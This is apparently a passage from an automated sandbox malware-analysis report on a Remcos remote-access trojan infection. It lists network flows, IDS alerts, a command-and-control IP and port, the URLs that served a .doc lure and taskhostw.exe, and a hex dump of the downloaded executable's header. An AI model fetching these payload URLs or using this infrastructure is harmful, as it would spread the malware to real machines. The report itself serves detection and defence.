Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.168.7.25:80
Source: global traffic	TCP traffic: 104.168.7.25:80 -> 192.168.2.22:49170

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2022050 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 : 104.168.7.25:80 -> 192.168.2.22:49170
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49171 -> 107.173.4.16:2404
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49172 -> 107.173.4.16:2404
Source: Network traffic	Suricata IDS: 2022051 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 : 104.168.7.25:80 -> 192.168.2.22:49170

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\svchost.exe	Domain query: geoplugin.net
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 107.173.4.16 2404	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 178.237.33.50 80	Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 107.173.4.16

Source: global traffic

TCP traffic: 192.168.2.22:49171 -> 107.173.4.16:2404

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 12 Oct 2024 14:39:56 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Last-Modified: Sat, 12 Oct 2024 07:42:35 GMTETag: "13b200-62442bf48212e"Accept-Ranges: bytesContent-Length: 1290752Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/lnkData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 16 73 92 92 52 12 fc c1 52 12 fc c1 52 12 fc c1 14 43 1d c1 50 12 fc c1 cc b2 3b c1 53 12 fc c1 5f 40 23 c1 61 12 fc c1 5f 40 1c c1 e3 12 fc c1 5f 40 1d c1 67 12 fc c1 5b 6a 7f c1 5b 12 fc c1 5b 6a 6f c1 77 12 fc c1 52 12 fd c1 72 10 fc c1 e7 8c 16 c1 02 12 fc c1 e7 8c 23 c1 53 12 fc c1 5f 40 27 c1 53 12 fc c1 52 12 6b c1 53 12 fc c1 e7 8c 22 c1 53 12 fc c1 52 69 63 68 52 12 fc c1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 63 28 0a 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0c 00 00 de 08 00 00 d0 0a 00 00 00 00 00 4a 7f 02 00 00 10 00 00 00 f0 08 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 20 14 00 00 04 00 00 0e 4e 14 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c a4 0b 00 7c 01 00 00 00 70 0c 00 3c 28 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 13 00 30 71 00 00 c0 2b 09 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 48 0a 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 08 00 84 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 2e dd 08 00 00 10 00 00 00 de 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 0e e1 02 00 00 f0 08 00 00 e2 02 00 00 e2 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 74 8f 00 00 00 e0 0b 00 00 52 00 00 00 c4 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 3c 28 07 00 00 70 0c 00 00 2a 07 00 00 16 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 30 71 00 00 00 a0 13 00 00 72 00 00 00 40 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic

HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
Source: Joe Sandbox View	ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
Source: Joe Sandbox View	ASN Name: ATOM86-ASATOM86NL ATOM86-ASATOM86NL

Source: Joe Sandbox View	JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox View	JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

Source: Network traffic

Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.22:49173 -> 178.237.33.50:80

Source: global traffic	HTTP traffic detected: GET /7al0eY HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: shuvi.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xampp/ew/wecreatednewthigsforsuccessfulljournecyr________verynicepeoplesetirethigstogoformegreat________________nnicwaytoentreithigntochangewithmegreat.doc HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 104.168.7.25Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /450/taskhostw.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 104.168.7.25Connection: Keep-Alive

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49164 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49165 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49166 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.25
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.25
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.25
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.25
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.25
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.25
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.25
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.25
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.25
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.25
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.25
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.25
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.25
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.25
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.25
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.25
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.25
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.25
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.25
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.25
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.25
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.25
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.25
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.25
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.25
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.25
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.25
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.25
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.25
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.7.25
